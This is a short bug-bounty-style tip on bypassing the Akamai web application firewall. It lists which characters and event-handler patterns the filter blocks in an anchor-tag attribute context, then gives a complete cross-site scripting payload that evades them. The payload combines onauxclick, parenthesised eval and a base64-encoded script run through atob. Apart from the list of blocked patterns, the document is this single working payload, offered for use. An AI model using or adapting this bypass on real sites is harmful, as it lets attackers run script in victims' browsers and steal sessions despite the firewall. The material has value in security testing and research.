Akamai WAF Bypass
Reflection in “a” tag, attribute context:
* < => allowed
* <anything> => access denied
* quotes => allowed
* onanything= => access denied
* / or \ or eval() = access denied
Bypass:
\”<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss